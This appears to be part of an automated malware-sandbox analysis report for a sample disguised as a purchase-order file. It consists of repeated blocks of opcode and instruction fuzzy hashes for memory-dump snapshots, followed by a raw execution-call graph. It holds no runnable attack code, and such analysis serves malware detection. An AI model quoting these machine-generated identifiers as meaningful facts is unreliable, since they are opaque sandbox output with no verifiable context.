                                        • Opcode Fuzzy Hash: c8be1ec933337c1c3fcc175bd9a2a994f6bed758937b58d8c525c3ab756bd46c
                                        • Instruction Fuzzy Hash: AD412574E09209CFCF14DFAAE4A49EEBBB6AF89311F14906AE415B7360DB305802CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 635084a14751b6b8e15ab29717cf14487690074dab3d1eb9090414d3fe700da7
                                        • Instruction ID: a26b0542da677f33153795cc5ddf3f237d52dfb2b7f32a9650dda94f9acc977f
                                        • Opcode Fuzzy Hash: 635084a14751b6b8e15ab29717cf14487690074dab3d1eb9090414d3fe700da7
                                        • Instruction Fuzzy Hash: 1E41E279E05209CBCF14DFAAE454AEEBBB6AF89311F14902AE415A7360DB305942CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54584391c0fad5c1e11124e3243a78b666aa9e57ee897a283714a59076c010c9
                                        • Instruction ID: b55d2adbfe0fc50dbafbadef23320460b056425aa3b1377cd12125b3bebce943
                                        • Opcode Fuzzy Hash: 54584391c0fad5c1e11124e3243a78b666aa9e57ee897a283714a59076c010c9
                                        • Instruction Fuzzy Hash: 0C410874E052099FDF04DFA9D464AAEBBF6AF99304F10916AE409A7361DB309901CF62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 753c3755036f406148dc7ccdb1b7b5ae37a78eb555545b8d948d6ef089d7d6ff
                                        • Instruction ID: cfc52e32944a4bcfe76c2af00b2d9353fc38a03eb5382c74aa056ddb5ae7edd1
                                        • Opcode Fuzzy Hash: 753c3755036f406148dc7ccdb1b7b5ae37a78eb555545b8d948d6ef089d7d6ff
                                        • Instruction Fuzzy Hash: EE41B078D003188BDB28DFB5E95899EBFB2FB8A301F60D129D849A7354DB351845CF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3564faddd64fa8bc11b7f7bc8412255ab9bee35fb7767c9f579f6911ce688b3
                                        • Instruction ID: a2e1b661903d126bae66db0c81be98e03b5228109df54e427084fcdfb41fe9bb
                                        • Opcode Fuzzy Hash: e3564faddd64fa8bc11b7f7bc8412255ab9bee35fb7767c9f579f6911ce688b3
                                        • Instruction Fuzzy Hash: E631F278D002099BCF18EFB0E4508EEBBB2EF6A301B50646ED95577394DB365906CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d43193c2de2aaa1d6b47e453a4baa83733244315ff74493e18a89dbc74feb7f
                                        • Instruction ID: 8205d64e09435bc78732c195a340a93808b5b33d85e34e3f7be8439a3a5c83ce
                                        • Opcode Fuzzy Hash: 6d43193c2de2aaa1d6b47e453a4baa83733244315ff74493e18a89dbc74feb7f
                                        • Instruction Fuzzy Hash: FD31DE78E05208DBDF18DFA9E558AEEBBF5FB89301F10906AE415A3360DB305906CF64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b4538849b68dda135c90e2bdad39f26cd0b765f4f2ad185ca954c9f3fb175b0
                                        • Instruction ID: 4b987981cad02e45a0aa35bf88ae64a919716c3aa42dc1d72c8e6264c40079de
                                        • Opcode Fuzzy Hash: 3b4538849b68dda135c90e2bdad39f26cd0b765f4f2ad185ca954c9f3fb175b0
                                        • Instruction Fuzzy Hash: 2321DA38A45218CFEF20DF94D598BACB7B5BB09711F14509AE90AA7762C7749E86CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2cf5e89678cb72ea3142959793833febaf363dfcfe8598d2a66c92d9b9bdcfd8
                                        • Instruction ID: 2600dd03f9c1c2207971493ccf42b90052dc579e2a1c29f597170251385bee08
                                        • Opcode Fuzzy Hash: 2cf5e89678cb72ea3142959793833febaf363dfcfe8598d2a66c92d9b9bdcfd8
                                        • Instruction Fuzzy Hash: 2821C678A01208CFDB14DFA4E958AADBBB6FF49300F1484AAD909A3364CB755D91CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4aec3216884c9f1011fbfb939e95448523edb9b622acd1ae256782bb76a6da56
                                        • Instruction ID: 017bf062dd616066e87a2697af8403f8171b011b65d535d9db8edafa9db1cde4
                                        • Opcode Fuzzy Hash: 4aec3216884c9f1011fbfb939e95448523edb9b622acd1ae256782bb76a6da56
                                        • Instruction Fuzzy Hash: 741170B1D491048BDF54DB69D8656EEBBB9AB8D700F14902BD805F3261DB720841CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17bb85ae2e6a9df35ba1329fb29ab6c27f755f86c7977c7bd0980790820281d3
                                        • Instruction ID: 3bb9d252d4d2f8dfc5bb94fa41deceedc4b5aa3f5917c0c53c7085e17398fca3
                                        • Opcode Fuzzy Hash: 17bb85ae2e6a9df35ba1329fb29ab6c27f755f86c7977c7bd0980790820281d3
                                        • Instruction Fuzzy Hash: DB21FF78E05248DFCF18CFB9E5849EDBBF1EF8A300F00906AE814A7221D73099068B04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 637663c28e98e39f8f622a5507f7721d7d6aa145a87851c4ad899b698ae8fa98
                                        • Instruction ID: 9f77c9822841488e8a2ab53367ced497b30731954e536dc9c085436fced3305f
                                        • Opcode Fuzzy Hash: 637663c28e98e39f8f622a5507f7721d7d6aa145a87851c4ad899b698ae8fa98
                                        • Instruction Fuzzy Hash: 66015E34D19204DFCB24EFBAA51A2ADBBF8EF8A201F009496F459D3226E7344511CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34442c3dfbb63f83cc17fd497c06d9ed4bdfe075f56fd44dea68431f28c389eb
                                        • Instruction ID: 61734d8e5489029439779e2e4e45ed60f33ad7e2455f8b2e08184d0c9508f2aa
                                        • Opcode Fuzzy Hash: 34442c3dfbb63f83cc17fd497c06d9ed4bdfe075f56fd44dea68431f28c389eb
                                        • Instruction Fuzzy Hash: 52219478E04318CFCB60CF64D958BAEBBB1FF4A301F0094AAD549A3254DB700A85CF16
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d0578b5db9df91a365609a409adf6ad8d6f2be9ea65ffa6bd61e19dd59145d9
                                        • Instruction ID: f14a64c23c8159184322f7c86b2a26acae7b423f9c73bd5e4cf4bff9cc67f371
                                        • Opcode Fuzzy Hash: 9d0578b5db9df91a365609a409adf6ad8d6f2be9ea65ffa6bd61e19dd59145d9
                                        • Instruction Fuzzy Hash: 2A0140B5D491088FDF44DFA9D964AEEBBF9AB8DB00F14902BD805F3264CB720841CB64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e400cce202f58f336629b8485feae2157cf5ecfd09a3d8885ae03548f31c529c
                                        • Instruction ID: b1bbf8dd406956ce99c87d5f66da46d7693f7d2a226936681004e83e1ebda186
                                        • Opcode Fuzzy Hash: e400cce202f58f336629b8485feae2157cf5ecfd09a3d8885ae03548f31c529c
                                        • Instruction Fuzzy Hash: 53011734D09204DFCF14EFBAA5596ADBBF8AF4D301F009456F459D3215D73045418B80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2192358ecafd404887c6b31a2d221b262dbdb974b8ced8cf3ee12ca727afede
                                        • Instruction ID: fd0b45f326f0ffcc8e5d0d34a51dbeb519d39120c529e9113982afec22bd3edd
                                        • Opcode Fuzzy Hash: b2192358ecafd404887c6b31a2d221b262dbdb974b8ced8cf3ee12ca727afede
                                        • Instruction Fuzzy Hash: 86019378A09654CFCB54CF28C9A8E997BB4BF4E711F1551DAE80AAB362C731AD40CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82565371c9419176d736991cad59ca884db852ec60f478733e6b03c2fa626300
                                        • Instruction ID: ade58ab505edc4065f3244df17dd136c6284d73ad6b7b922b3a07671f01170af
                                        • Opcode Fuzzy Hash: 82565371c9419176d736991cad59ca884db852ec60f478733e6b03c2fa626300
                                        • Instruction Fuzzy Hash: 06011274D04209EFDB40EFA8D800BBEBBB5BB09300F60916AD904BB350DB319A10DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 335528c6e6b242ee727034b60876969d5c98bbb4b607040b356ab8ad7a632ed3
                                        • Instruction ID: 908bae414f68c07508f4ee5e41a5cf04b1ead95996240869bacff8bf9a3faf3c
                                        • Opcode Fuzzy Hash: 335528c6e6b242ee727034b60876969d5c98bbb4b607040b356ab8ad7a632ed3
                                        • Instruction Fuzzy Hash: 97119E78D08229CFCF60CF64E998BADBBB5BB0A304F0054AAE41DA3351D7B15A85CF05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d48cf6ff29a0ebb666d9ea326b1d8c2849e82b70bf9d727a5f053e3a0cb73c59
                                        • Instruction ID: be82b4965828751bef6d5c136cde69fd728a1a355785ce2bcdc89c7f48acb48c
                                        • Opcode Fuzzy Hash: d48cf6ff29a0ebb666d9ea326b1d8c2849e82b70bf9d727a5f053e3a0cb73c59
                                        • Instruction Fuzzy Hash: 20F09035E051188BCF04DFA9E814ADDBBB9EB8D711F006127D50173310DB311C15CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10dcfa307f1e26b447f06904099ee39c6a9d491791853c3e510fc9f4f871c1fc
                                        • Instruction ID: a2007757930f658d1b8ffb2ebae72ffa146938b631ee01c2ea8402fd4ef98ff1
                                        • Opcode Fuzzy Hash: 10dcfa307f1e26b447f06904099ee39c6a9d491791853c3e510fc9f4f871c1fc
                                        • Instruction Fuzzy Hash: 7CF06D70D14248AFCB40EFA8D4986DDBFF0EB45301F0089E6D848A3211D7345A42DB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69a7a3d80f50432bb41739957bfad2a178b12ee5c3562db20713b158af6fa71b
                                        • Instruction ID: cb0a8220d7d86c3e2ea4c74ed234b582b0d64edd136e4723f4d66fdf1e91fcc3
                                        • Opcode Fuzzy Hash: 69a7a3d80f50432bb41739957bfad2a178b12ee5c3562db20713b158af6fa71b
                                        • Instruction Fuzzy Hash: 12F039B4D1438CEFCB12EBA8A84929CBFB0FB45300F0085EAD84493251D7315A42DF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39fdf813760e63f2225b7c01b5d16e1f73e108ef19f7a2e2e42c33b103fc4024
                                        • Instruction ID: 31813763129b52807003048a44488899269edcea02775722ba38e06249eeb92f
                                        • Opcode Fuzzy Hash: 39fdf813760e63f2225b7c01b5d16e1f73e108ef19f7a2e2e42c33b103fc4024
                                        • Instruction Fuzzy Hash: F1F06278908329CFCF60CF64E9A4AADBBB5BB1A301F0054A6E41DA3215DB715A85CF05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53333c9c3eca5f2d42756af6d77e458b22c0ef15146bcd5d2fff88a921d21efe
                                        • Instruction ID: 8287a784ae717fa8318cf27642d7792e7f8dba7305811f2ab584024150d116f0
                                        • Opcode Fuzzy Hash: 53333c9c3eca5f2d42756af6d77e458b22c0ef15146bcd5d2fff88a921d21efe
                                        • Instruction Fuzzy Hash: 31F09278E09218DFCF25CF64D994A9CBBF1AF19300F14909AE819AB362D730A941CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9561193a3f2213bd3f0818cf48a39923a61b05648397c00ca02a6869d31a30af
                                        • Instruction ID: a6e2171043b131656d6480f2839fa01678eed702f491fa32652555d78c3d683a
                                        • Opcode Fuzzy Hash: 9561193a3f2213bd3f0818cf48a39923a61b05648397c00ca02a6869d31a30af
                                        • Instruction Fuzzy Hash: A2E0C278608A54CFCB51DF28D9A89A57BB8BB8EB01F4010D6E90A9B331C734AD40CE10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 226452219cff099c0f9f86769df041c7b94d70e1a22e8fe6067a83d9c29c6049
                                        • Instruction ID: 1bb2ea6c092e20d9042fea72988f49786a482cbc6a1a7836f4c6ef01c356c8fd
                                        • Opcode Fuzzy Hash: 226452219cff099c0f9f86769df041c7b94d70e1a22e8fe6067a83d9c29c6049
                                        • Instruction Fuzzy Hash: 29E08C39E0611AEFCB909BA4F848ADAF730FF12311F044096D85A93012C73109A6CF01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7707b3bf90f4dcd7d6fa78a89c4e7f01d2be3df7ccf4db88b7a7490c0533b524
                                        • Instruction ID: ed0e7df169cf05cad550f3765e4a58d302f4ab62bb95230f73d1f4adb135b87a
                                        • Opcode Fuzzy Hash: 7707b3bf90f4dcd7d6fa78a89c4e7f01d2be3df7ccf4db88b7a7490c0533b524
                                        • Instruction Fuzzy Hash: D0E0B674D0020CEFCB54EFA8E44869DBBF4FB48301F1081AAD818A3354D7345A51DF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c4e7c479996f30add699e63d45ab3c325a22949580544d15b4673a2c5cad390
                                        • Instruction ID: fea313a9ddf2098962d831dff51120babc81f55ef8ad3cdfcd2739a34c61633b
                                        • Opcode Fuzzy Hash: 6c4e7c479996f30add699e63d45ab3c325a22949580544d15b4673a2c5cad390
                                        • Instruction Fuzzy Hash: 43E04F78949219CFDF64DFA4D894AECBBB8BB49700F0051DAC80EA7350CB325D818F40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3bafa18c43b298b6434b09200544b81d7b399513e20824f12fbbddf84d61123
                                        • Instruction ID: ecbfa858ac91b4f289eab1c0aff256575b9c71089547d23dc43f61b549728829
                                        • Opcode Fuzzy Hash: f3bafa18c43b298b6434b09200544b81d7b399513e20824f12fbbddf84d61123
                                        • Instruction Fuzzy Hash: 86E0E5B4608690CFCB51CB28D9989D53BB4BF4E311F1401E6E44A9B372C730D942CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06f9c1dbaec6829c5b63ced6bb6cb8a779a590015c340c66e1329ea06d43477e
                                        • Instruction ID: d4cc66a782af44e1693d42350639a66442fe9800ea9d755b3ce55df0d5ba4867
                                        • Opcode Fuzzy Hash: 06f9c1dbaec6829c5b63ced6bb6cb8a779a590015c340c66e1329ea06d43477e
                                        • Instruction Fuzzy Hash: 6FD0E974808654DFCF519F28C95D5D9B7B4FF19701F1011F6D809AA225D7354D91DF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4d2269bcfb5c8d6197cbe54bf1d5eb0147e311a2f70582c5df3c940ed2c5858
                                        • Instruction ID: c305632bf9f87f4d7aa31d36009b060303ee09eed67b0cbf6fcf1768b18286ff
                                        • Opcode Fuzzy Hash: d4d2269bcfb5c8d6197cbe54bf1d5eb0147e311a2f70582c5df3c940ed2c5858
                                        • Instruction Fuzzy Hash: 4ED0CAB4802218CBEBA0CF60DC88B8CBBB0BB08300F10819AD44AB3240CA300EC88F08
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f02e76b5401dd556e8781559b05f294423eb4ef779c3671dc0a3391ee38a4cab
                                        • Instruction ID: 9e43225ab28af6b60ccfd75647df1678b75f806193eac400b5e9f8cd2335a83e
                                        • Opcode Fuzzy Hash: f02e76b5401dd556e8781559b05f294423eb4ef779c3671dc0a3391ee38a4cab
                                        • Instruction Fuzzy Hash: EAC00278614214DFCB40DF54D894C58B775FF4DB117115055E8065B335C735AC41CA00

                                        Execution Graph

                                        Execution Coverage:30.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:4.4%
                                        Total number of Nodes:1846
                                        Total number of Limit Nodes:93
                                        execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8397 409423 8365->8397 8368 409df7 8366->8368 8367 409e1c 8369 4031e5 4 API calls 8367->8369 8367->8397 8368->8367 8371 402bab 2 API calls 8368->8371 8370 409e62 8369->8370 8372 4031e5 4 API calls 8370->8372 8371->8367 8373 409e82 8372->8373 8374 4031e5 4 API calls 8373->8374 8375 409ea2 8374->8375 8376 4031e5 4 API calls 8375->8376 8377 409ec2 8376->8377 8378 4031e5 4 API calls 8377->8378 8379 409ee2 8378->8379 8380 4031e5 4 API calls 8379->8380 8381 409f02 8380->8381 8382 4031e5 4 API calls 8381->8382 8383 409f22 8382->8383 8384 4031e5 4 API calls 8383->8384 8387 409f42 8384->8387 8385 40a19b 8386 408b2c 4 API calls 8385->8386 8386->8397 8387->8385 8388 409fa3 8387->8388 8389 405b6f 6 API calls 8388->8389 8388->8397 8390 409fbd 8389->8390 8391 40a02c 8390->8391 8392 402bab 2 API calls 8390->8392 8393 4031e5 4 API calls 8391->8393 8419 40a16d 8391->8419 8396 409fd7 8392->8396 8394 40a070 8393->8394 8399 4031e5 4 API calls 8394->8399 8395 402bab 2 API calls 8395->8397 8398 405b6f 6 API calls 8396->8398 8397->8357 8420 4056bf 8397->8420 8401 409fe5 8398->8401 8400 40a090 8399->8400 8403 4031e5 4 API calls 8400->8403 8401->8391 8402 402bab 2 API calls 8401->8402 8404 409fff 8402->8404 8405 40a0b0 8403->8405 8406 405b6f 6 API calls 8404->8406 8408 4031e5 4 API calls 8405->8408 8407 40a00d 8406->8407 8407->8391 8410 40a021 8407->8410 8409 40a0d0 8408->8409 8412 4031e5 4 API calls 8409->8412 8411 402bab 2 API calls 8410->8411 8411->8397 8413 40a0f0 8412->8413 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8395 8419->8397 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 8432->8448 8433->8432 8437 408f31 8433->8437 8477 40a1b6 8433->8477 8435 405b6f 6 API calls 8435->8446 8436 402bab 2 API calls 8436->8432 8437->8436 8439 409031 8440 402bab 2 API calls 8439->8440 8440->8437 8441 409022 8442 402bab 2 API calls 8441->8442 8443 409028 8442->8443 8444 402bab 2 API calls 8443->8444 8444->8437 8445 402bab GetProcessHeap HeapFree 